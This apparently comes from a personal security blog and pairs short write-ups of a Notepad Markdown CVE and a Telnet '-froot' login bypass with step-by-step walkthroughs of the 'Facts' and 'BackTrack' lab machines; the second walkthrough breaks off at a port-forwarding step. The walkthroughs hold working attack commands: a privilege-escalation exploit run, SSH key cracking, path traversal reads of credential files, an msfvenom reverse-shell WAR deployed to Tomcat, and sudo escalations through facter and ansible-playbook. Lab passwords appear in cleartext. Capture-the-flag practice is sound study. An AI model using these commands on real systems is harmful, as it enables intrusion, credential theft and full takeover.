https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841

Details

Detail	Value
CVE ID	CVE-2026-20841
CVSS Score	8.8 (High)
Vulnerability Type	Command Injection (CWE-77)
Affected App	Modern Notepad app (Microsoft Store)
Affected Versions	11.0.0 to 11.2509
Fixed In	11.2510+
Patch Date	February 10, 2026
Active Exploitation	Yes, PoC available
Workaround	Limited (update required)

Overview

we all have used windows notepad right ? back to previous days in the era of windows 10 and 7 when windows notepad considered as only notepad with no bloated things and AI stuffs.

but in moderen Windows 11 added Markdown handling. The issue is that the Markdown link handler does not validate link protocols before execution. so a crafted .md file can trigger command execution when a user clicks a link.

“Someone at Microsoft thought “what if Notepad could execute commands?” and shipped it enabled by default. Attackers can now trick users into opening a malicious .md file, you click a link, and BAM, code runs with your full permissions. Full system compromise. It is that bad.

The vulnerability itself is straightforward. Notepad’s Markdown handler does not validate what is in those links before executing them. A specially made file with the right protocol prefix does the rest. Phishing a user to click becomes a full system compromise.”

Source: https://foss-daily.org/posts/microsoft-notepad-2026/

Attack Flow

An attacker sends a malicious .md file (for example, meeting-notes.md).
The victim opens it in Notepad and clicks a link.
The link triggers command execution instead of opening in a browser.
The attacker gets full system control.

Proof of Concept

https://github.com/BTtea/CVE-2026-20841-PoC

Mitigation

Update Notepad to 11.2510 or later. and for safely disable AI stuffs and turn of markdown preview. thats all folks happy hacking !

HTB-Facts

2026-02-11T00:00:00+00:00

Initial Reconnaissance

its a easy machine ! lets start

after getting the ip first i run rustscan cause it really faster than nmap

rustscan -a 10.129.13.46 --ulimit 1000 -r 1-65535 -- -A -sC -Pn

Scan Results

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNYjzL0v+zbXt5Zvuhd63ZMVGK/8TRBsYpIitcmtFPexgvOxbFiv6VCm9ZzRBGKf0uoNaj69WYzveCNEWxdQUww=
|   256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPCNb2NXAGnDBofpLTCGLMyF/N6Xe5LIri/onyTBifIK
80/tcp    open  http    syn-ack ttl 63 nginx 1.26.3 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
54321/tcp open  http    syn-ack ttl 62 Golang net/http server
|_http-server-header: MinIO
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 189317C4741475EB
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Wed, 11 Feb 2026 04:46:51 GMT
|     
|     InvalidRequestInvalid Request (invalid argument)/nice ports,/Trinity.txt.bak189317C4741475EBdd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 189317C010F52C3E
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Wed, 11 Feb 2026 04:46:32 GMT
|     
|     InvalidRequestInvalid Request (invalid argument)/189317C010F52C3Edd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Wed, 11 Feb 2026 04:46:32 GMT
|_    Content-Length: 0

Web Enumeration

after headover to port 80 the webserver hosts shows title facts.htb so quickly add it to /etc/hosts along with ip

http://facts.htb/ - its a simple blog or image sharing site

upon looking at the source code reveals its running something called Camaleon CMS

Camaleon CMS is a dynamic and advanced content management system based on Ruby on Rails

then quickly run gobuster

gobuster dir -u http://facts.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt

and found interesting a endpoint /admin

Exploitation - CVE-2025-2304

since i coudn’t detect the cms version i just searching latest CVE or vulnerability related to it then i found

https://github.com/predyy/CVE-2025-2304
CVE-2025-2304 - Camaleon CMS Privilege Escalation

A Privilege Escalation through a Mass Assignment exists in Camaleon CMS When a user wishes to change his password, the ‘updated_ajax’ method of the UsersController is called. The vulnerability stems from the use of the dangerous permit! method, which allows all parameters to pass through without any filtering.

Impact: An attacker can exploit this to modify object attributes, potentially leading to privilege escalation.

means if i just register as a new user and i can be able to be admin right ? so lets go

┌──(kali㉿blackXploit)-[~/Downloads/factshtb/CVE-2025-2304]
└─$ python3 exp.py http://facts.htb/admin test test@test
[*] Logging in as test ...
[+] Login successful
[+] Got profile page
[i] Version detected: 2.9.0 (< 2.9.1) - appears to be vulnerable version
[+] authenticity_token: PpN31aC00B4IEFOyQN4l8Zj7mkNFw4HpmQjDr7tH8emXiQMm_5RktUs_OANR-8xeE9P5A5LD3lLgnQlfT1VPyQ
http://facts.htb/admin/users/5/updated_ajax
[*] Submitting password change request
[+] Submit successful, you should be admin

now i am admin

AWS Credentials Discovery

after headover to http://facts.htb/admin/settings/site

i found juicy stuffs like AWS s3 access key now we can acess this stuff with the help of aws cli

└─$ aws s3 ls    

An error occurred (InvalidAccessKeyId) when calling the ListBuckets operation: The AWS Access Key Id you provided does not exist in our records.
                                             
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ aws configure --profile facts
AWS Access Key ID [None]: AKIA237FBBCAFC84DA9E
AWS Secret Access Key [None]: 1I6oQXf2PZH20fVOdFL+AKZ+gtZwH70nDg/atEKH
Default region name [None]: us-east-1
Default output format [None]: json
                                                                                                                                                                           
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ aws s3 ls --endpoint-url http://facts.htb:54321 --profile facts
2025-09-11 08:06:52 internal
2025-09-11 08:06:52 randomfacts

┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ aws s3 ls s3://internal/ --endpoint-url http://facts.htb:54321 --profile facts
                           PRE .bundle/
                           PRE .cache/
                           PRE .ssh/
2026-01-08 13:45:13        220 .bash_logout
2026-01-08 13:45:13       3900 .bashrc
2026-01-08 13:47:17         20 .lesshst
2026-01-08 13:47:17  

SSH Key Extraction

after dig into /internal dir we got .ssh then quicky cpy this to current dir

aws s3 cp s3://internal/.ssh /home/kali/Downloads/factshtb --endpoint-url http://facts.htb:54321 --profile facts --recursive
download: s3://internal/.ssh/id_ed25519 to ./id_ed25519             
download: s3://internal/.ssh/authorized_keys to ./authorized_keys 

Cracking SSH Key

the id i have got is encrypted so need to crack it fr that i use

python3 /usr/share/john/ssh2john.py id_ed25519 > key.john

┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt key.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dra[redact]      (id_ed25519)     
1g 0:00:06:18 DONE (2026-02-11 00:46) 0.002641g/s 8.452p/s 8.452c/s 8.452C/s fireman..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Getting User Access

i got the passphrase lets connect to port 22

┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ ssh-keygen -y -f id_ed25519 > id_ed25519.pub
Enter passphrase for "id_ed25519": 
                                                                                                                    
this will generate .pub file so we know the user                                                                                                  
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ ls
authorized_keys  CVE-2025-2304  id_ed25519  id_ed25519.hash  id_ed25519.pub  key.john  writeup.md
                                                                                                                    
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ cat id_ed25519.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA6uqf/MuO5odDM453bZdApeHLnufnUfStkZcK5e/2QQ redacted@facts.htb
                                                                                                                                                                                
┌──(kali㉿blackXploit)-[~/Downloads/factshtb]
└─$ ssh -i id_ed25519 trivia@facts.htb
Enter passphrase for key 'id_ed25519': 
Last login: Wed Jan 28 16:17:19 UTC 2026 from 10.10.14.4 on ssh
Welcome to Ubuntu 25.04 (GNU/Linux 6.14.0-37-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Feb 11 06:26:36 AM UTC 2026

  System load:           0.13
  Usage of /:            74.2% of 7.28GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             221
  Users logged in:       1
  IPv4 address for eth0: 10.129.13.46
  IPv6 address for eth0: dead:beef::250:56ff:feb0:441b


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
trivia@facts:~$ ls
trivia@facts:/home$ ls
trivia  william
trivia@facts:/home$ cd william/
trivia@facts:/home/william$ ls
user.txt
trivia@facts:/home/william$ cat user.txt 
73f8a5[redacted]

Privilege Escalation to Root

next step is to get root for that use same method run sudo -l and notice

trivia@facts:/home/william$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

facter is a system profiling tool used by Puppet (configuration management), and it can execute Ruby code. Since you can run it as root with sudo and no password, you can exploit this to get a root shell.

lets craft the exploit

trivia@facts:/tmp$ mkdir -p /tmp/exploit
trivia@facts:/tmp$ cat > /tmp/exploit/root.rb << 'EOF'
Facter.add(:root_shell) do
  setcode do
    system("/bin/bash")
  end
end
EOF
trivia@facts:/tmp$ sudo /usr/bin/facter --custom-dir /tmp/exploit
root@facts:/tmp# 

i bet you , you cant find this type of writeup anywhere so if it helps please drop a comment below. thank you. thats all foxs ! have fun happy hacking.

CVE-2026-24061

2026-02-01T00:00:00+00:00

Telnet’s Backdoor: How a Simple Argument Injection Let Anyone Be Root

its crazy ! CVE Score around 9.8/10

found in telnet [ Telnet (TELecommunication NETwork) is a foundational, text-based network protocol and application (running on TCP port 23) that enables a user to remotely access and manage another computer, server, or networking device via a command-line interface. Developed in 1969, it provides a virtual terminal connection, appearing as if the user is physically present at the remote machine ] source [ https://en.wikipedia.org/wiki/Telnet]

i recenly analyzed this crazy CVE and wondering how a tiny logic can spawn root shell after hiding for 11 years

how it works ?

think of like Telnet Server as a bouncer at a club who ask for your ID before enter

The Handshake: When you connect to a Telnet server, the server and your computer exchange some “environment variables”—basic info like your username.

The Command: Normally, the Telnet server takes the username you give it and runs a command like: login [your_username]

The Flaw (Argument Injection): The server doesn’t check what you put in the username field. An attacker can send a special “username” like -f root.

The Result: The server blindly runs the command: login -h [hostname] -f root

In Linux systems, the -f flag stands for “force” or “fast” login. It tells the system: “I’ve already checked this person’s ID, just let them in as the root user immediately.” Because the server trustingly passed that flag along, it bypasses the password screen entirely and drops the attacker directly into a root command prompt.

This bug was accidentally added to the code in 2015 and sat there undiscovered until 2026

if you look closely , you can see that the developers knew about the danger for the USER environment variable (case ‘U’), but they completely forgot to apply that same logic to the standard user_name variable (case ‘u’).

The Logic Gap In the code snippet, notice the difference between these two cases:

case ‘u’ (The Vulnerable One): return user_name ? xstrdup (user_name) : NULL; It just takes whatever string is in user_name and hands it over. If an attacker sends -froot, the system accepts it without question.

case ‘U’ (The Protected One): The code below it actually has a comment: /* Ignore user names starting with ‘-‘… as they can cause trouble. */. They wrote a specific check here to prevent exactly what CVE-2026-24061 exploits.

How an Attacker Abuses This Because case ‘u’ was left unprotected, the attack follows this path:

Connection: The attacker connects via Telnet.

Environment Negotiation: The Telnet client sends an environment variable for the username.

The Payload: Instead of blackxploit, the attacker sends -froot.

The Expansion: The code hits case ‘u’, sees -froot, and calls xstrdup(“-froot”).

The Execution: The server then executes: login -h -froot.

The Bypass: The login program sees the -f flag and says, “Okay, I’ll log you in as root without a password.”

By creating sanitize(), the developers moved that logic from case ‘U’ into a reusable tool and applied it to all cases (‘h’, ‘l’, ‘L’, ‘t’, ‘T’, and ‘u’). This ensured that no matter which variable an attacker tried to mess with, the leading - would always be caught.

here is the exploit : https://github.com/JayGLXR/CVE-2026-24061-POC

i know its 2026 and no one use telnet but for those who use Update your GNU InetUtils to version 2.7-2 or newer immediately.

Thanks for reading !

THM - BackTrack

2026-01-26T00:00:00+00:00

after getting the target ip i first run rustscan

PORT     STATE SERVICE        REASON
22/tcp   open  ssh            syn-ack ttl 62
6800/tcp open  unknown        syn-ack ttl 62
8080/tcp open  http-proxy     syn-ack ttl 62
8888/tcp open  sun-answerbook syn-ack ttl 62

upon scanning using nmap reveals something beyound

nmap --min-rate=10000 -p- -A -sC -sV 10.48.163.82
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 10:10 EST
Nmap scan report for 10.48.163.82
Host is up (0.039s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
|   256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
|_  256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
6800/tcp open  http            aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
8080/tcp open  http            Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
8888/tcp open  sun-answerbook?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sun, 25 Jan 2026 15:10:55 GMT
|     Connection: close
|     
|     
|     
|     
|     
|     
|     Vulnerability: Path Traversal (CVE-2023-39141)
Affected Software: webui-aria2 (web interface for aria2)
Impact: A remote, unauthenticated attacker can read sensitive files on the server hosting the web interface, often leading to full system control.
Root Cause: Improper input validation in the web server component of webui-aria2.



next i run nuclei 
to confirm its vulnerability
┌──(kali㉿blackXploit)-[~/Downloads/backtrack]
└─$ nuclei -t /home/kali/Downloads/CVE-2023-39141.yaml --target http://10.48.163.82:8888/

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Your current nuclei-templates v10.3.2 are outdated. Latest is v10.3.7
[INF] Successfully updated nuclei-templates (v10.3.7) to /home/kali/.local/nuclei-templates. GoodLuck!

Nuclei Templates v10.3.7 Changelog
┌───────┬───────┬──────────┬─────────┐
│ TOTAL │ ADDED │ MODIFIED │ REMOVED │
├───────┼───────┼──────────┼─────────┤
│ 4049  │ 410   │ 3637     │ 2       │
└───────┴───────┴──────────┴─────────┘
[INF] Current nuclei version: v3.4.10 (outdated)
[INF] Current nuclei-templates version: v10.3.7 (latest)
[INF] New templates added in latest release: 102
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2023-39141] [http] [high] http://10.48.163.82:8888/../../../../etc/passwd
[INF] Scan completed in 1.347609983s. 1 matches found.



using burp to send this req

GET /../../../../etc/passwd HTTP/1.1
Host: 10.48.163.82:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: aria2filters=%22%7B%5C%22s%5C%22%3Atrue%2C%5C%22a%5C%22%3Atrue%2C%5C%22w%5C%22%3Atrue%2C%5C%22c%5C%22%3Atrue%2C%5C%22e%5C%22%3Atrue%2C%5C%22p%5C%22%3Atrue%2C%5C%22r%5C%22%3Atrue%7D%22; aria2conf=%7B%22host%22%3A%2210.48.163.82%22%2C%22path%22%3A%22/jsonrpc%22%2C%22port%22%3A6800%2C%22encrypt%22%3Afalse%2C%22auth%22%3A%7B%7D%2C%22directURL%22%3A%22%22%7D
Upgrade-Insecure-Requests: 1
Priority: u=0, i


response :

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 25 Jan 2026 15:22:03 GMT
Connection: keep-alive
Content-Length: 1975

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:112:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:122:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash



after that i have tried to read the flag content by passing encoded paths and i got 404 
i tried to
ffuf -u "http://10.48.163.82:8888/../../../../FUZZ" -w /usr/share/wordlists/dirb/common.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.48.163.82:8888/../../../../FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 500, Size: 62, Words: 9, Lines: 2, Duration: 52ms]
bin                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 38ms]
boot                    [Status: 500, Size: 66, Words: 9, Lines: 2, Duration: 43ms]
dev                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 50ms]
data                    [Status: 500, Size: 66, Words: 9, Lines: 2, Duration: 210ms]
etc                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 41ms]
home                    [Status: 500, Size: 66, Words: 9, Lines: 2, Duration: 39ms]
lib                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 40ms]
lost+found              [Status: 500, Size: 64, Words: 6, Lines: 2, Duration: 37ms]
media                   [Status: 500, Size: 67, Words: 9, Lines: 2, Duration: 40ms]
opt                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 41ms]
proc                    [Status: 500, Size: 66, Words: 9, Lines: 2, Duration: 38ms]
root                    [Status: 500, Size: 58, Words: 6, Lines: 2, Duration: 39ms]
run                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 38ms]
sbin                    [Status: 500, Size: 66, Words: 9, Lines: 2, Duration: 38ms]
srv                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 47ms]
sys                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 47ms]
tmp                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 38ms]
usr                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 37ms]
var                     [Status: 500, Size: 65, Words: 9, Lines: 2, Duration: 35ms]
:: Progress: [4614/4614] :: Job [1/1] :: 1000 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

cat > files.txt << EOF
etc/passwd
etc/shadow
etc/hosts
flag
flag.txt
root.txt
user.txt
home/orville/user.txt
home/wilbur/user.txt
root/root.txt
var/www/html/index.html
opt/tomcat/webapps/ROOT/index.jsp
home/orville/.ssh/id_rsa
home/wilbur/.ssh/id_rsa
EOF

ffuf -u "http://10.48.163.82:8888/../../../../FUZZ" -w files.txt -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.48.163.82:8888/../../../../FUZZ
 :: Wordlist         : FUZZ: /home/kali/Downloads/backtrack/files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

etc/hosts               [Status: 200, Size: 288, Words: 12, Lines: 13, Duration: 84ms]
etc/passwd              [Status: 200, Size: 1975, Words: 17, Lines: 38, Duration: 83ms]
opt/tomcat/webapps/ROOT/index.jsp [Status: 200, Size: 12234, Words: 4318, Lines: 220, Duration: 84ms]
:: Progress: [14/14] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::


here i

Confirms tomcat user’s application files are accessible

By default, Tomcat stores credentials in
plain text within the conf/tomcat-users.xml file, which is a significant security vulnerability. However, Tomcat is highly configurable and supports various formats for storing credentials, including hashed and salted forms, through different CredentialHandler implementations

so we can use
curl --path-as-is 'http://10.48.163.82:8888/../../../../../../../../../../../../../../../../../../../../opt/tomcat/conf/tomcat-users.xml'




  
  




and we know the user name and password lets quickly login on apache tomcat manager with web ui but unfortunetly we are not allowed to do this

the manager runs on port 8080
get 403 
but in order to get RCE we need to upload shell

lets craft the payload 
using

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=port -f war -o shell.war 



why war  ?
A WAR (Web ARchive) file is a standard, portable file format used to package an entire Java-based web application for deployment on a web server or application server


so lets upload it via classic curl method

┌──(kali㉿blackXploit)-[~/Downloads/backtrack]
└─$ curl -u tomcat:OPx52k53D8OkTZpx4fr --upload-file shell.war "http://10.48.159.219:8080/manager/text/deploy?path=/shell/&update=true"
OK - Deployed application at context path [/shell/]


we can now execute it via again curl

curl -L http://10.48.159.219:8080/shell

nc -lvnp 4332

┌──(kali㉿blackXploit)-[~/Downloads/backtrack]
└─$ nc -lvnp 4332
listening on [any] 4332 ...
connect to [192.168.146.172] from (UNKNOWN) [10.48.159.219] 34250
python3 -c "import pty;pty.spawn('/bin/bash')"
tomcat@Backtrack:/$ ls
ls
bin   data  etc   lib    lib64   lost+found  mnt  proc  run   srv  tmp  vagrant
boot  dev   home  lib32  libx32  media       opt  root  sbin  sys  usr  var
tomcat@Backtrack:/$ cd /opt   
cd /opt
tomcat@Backtrack:/opt$ ;s
;s
bash: syntax error near unexpected token `;'
tomcat@Backtrack:/opt$ ls
ls
aria2  test_playbooks  tomcat
tomcat@Backtrack:/opt$ cd tomcat 
cd tomcat
tomcat@Backtrack:~$ ls
ls
BUILDING.txt     NOTICE         RUNNING.txt  flag1.txt  temp
CONTRIBUTING.md  README.md      bin          lib        webapps
LICENSE          RELEASE-NOTES  conf         logs       work
tomcat@Backtrack:~$ cat flag.txt 
cat flag.txt
cat: flag.txt: No such file or directory
tomcat@Backtrack:~$ cat flag1.txt
cat flag1.txt


now shell as willbur 
need sudo priv 
so 
lets check
tomcat@Backtrack:~$ 

tomcat@Backtrack:~$ sudo -l 
sudo -l 
Matching Defaults entries for tomcat on Backtrack:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tomcat may run the following commands on Backtrack:
    (wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
tomcat@Backtrack:~$ 


head over to gtfo bins and found 
https://gtfobins.org/gtfobins/ansible-playbook/

echo '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/dev/tty]}]' >/path/to/temp-file
ansible-playbook /path/to/temp-file

we use this as
sudo -u wilbur  /usr/bin/ansible-playbook /opt/test_playbooks/../../../dev/shm/shell.yml


tomcat@Backtrack:~$ sudo -u wilbur  /usr/bin/ansible-playbook /opt/test_playbooks/../../../dev/shm/shell.yml

we are now wilbur
and i found some juicy files lets read
loop-control     rtc0    tty23     tty45  ttyS0  ttyS30  vcsa5
$ cd /home
cd /home
$ ls
ls
orville  wilbur
$ cd wilbur  
cd wilbur
$ ls
ls
from_orville.txt
$ ls -la   
ls -la
total 28
drwxrwx--- 3 wilbur wilbur 4096 Jan 26 06:18 .
drwxr-xr-x 4 root   root   4096 Mar  9  2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Jan 26 06:18 .ansible
lrwxrwxrwx 1 root   root      9 Mar  9  2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar  9  2024 .bashrc
-rw------- 1 wilbur wilbur   48 Mar  9  2024 .just_in_case.txt
lrwxrwxrwx 1 root   root      9 Mar  9  2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar  9  2024 .profile
-rw------- 1 wilbur wilbur  461 Mar  9  2024 from_orville.txt
$ 

$ cat .just_in_case.txt 
cat .just_in_case.txt
in case i forget :

wilbur:mYe317Tb9qTNrWFND7KF
$ 
$ cat from_orville.txt
cat from_orville.txt
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:

email : orville@backtrack.thm
password : W34r3B3773r73nP3x3l$
$ 

we have got password for wilbur 
and as instructed/mentioned lets see the internal connections by running
$ ss -tlnp 
ss -tlnp
State   Recv-Q  Send-Q        Local Address:Port    Peer Address:Port  Process  
LISTEN  0       70                127.0.0.1:33060        0.0.0.0:*              
LISTEN  0       151               127.0.0.1:3306         0.0.0.0:*              
LISTEN  0       511               127.0.0.1:80           0.0.0.0:*              
LISTEN  0       1024                0.0.0.0:6800         0.0.0.0:*              
LISTEN  0       4096          127.0.0.53%lo:53           0.0.0.0:*              
LISTEN  0       128                 0.0.0.0:22           0.0.0.0:*              
LISTEN  0       1        [::ffff:127.0.0.1]:8005               *:*              
LISTEN  0       100                       *:8080               *:*              
LISTEN  0       1024                   [::]:6800            [::]:*              
LISTEN  0       128                    [::]:22              [::]:*              
LISTEN  0       511                       *:8888               *:*              
$ 


since we have the wilbur ssh password we can actully forward the port that is runnung locally
┌──(kali㉿blackXploit)-[~/Downloads/backtrack]
└─$ ssh -L 9999:127.0.0.1:80 wilbur@10.48.159.219
The authenticity of host '10.48.159.219 (10.48.159.219)' can't be established.
